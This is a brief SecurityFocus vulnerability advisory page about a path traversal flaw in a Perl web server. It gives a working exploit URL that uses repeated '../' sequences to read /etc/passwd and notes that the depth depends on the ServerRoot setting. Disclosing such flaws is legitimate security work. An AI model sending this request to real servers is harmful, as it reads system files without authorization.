Perl Web Server Path Traversal Vulnerability

To retrieve /etc/password from a vulnerable host, request:

http://www.server.com/../../../../etc/passwd

The number of ../ path characters will depend on the ServerRoot (location of the virtual / directory) setting.


 

Privacy Statement
Copyright 2010, SecurityFocus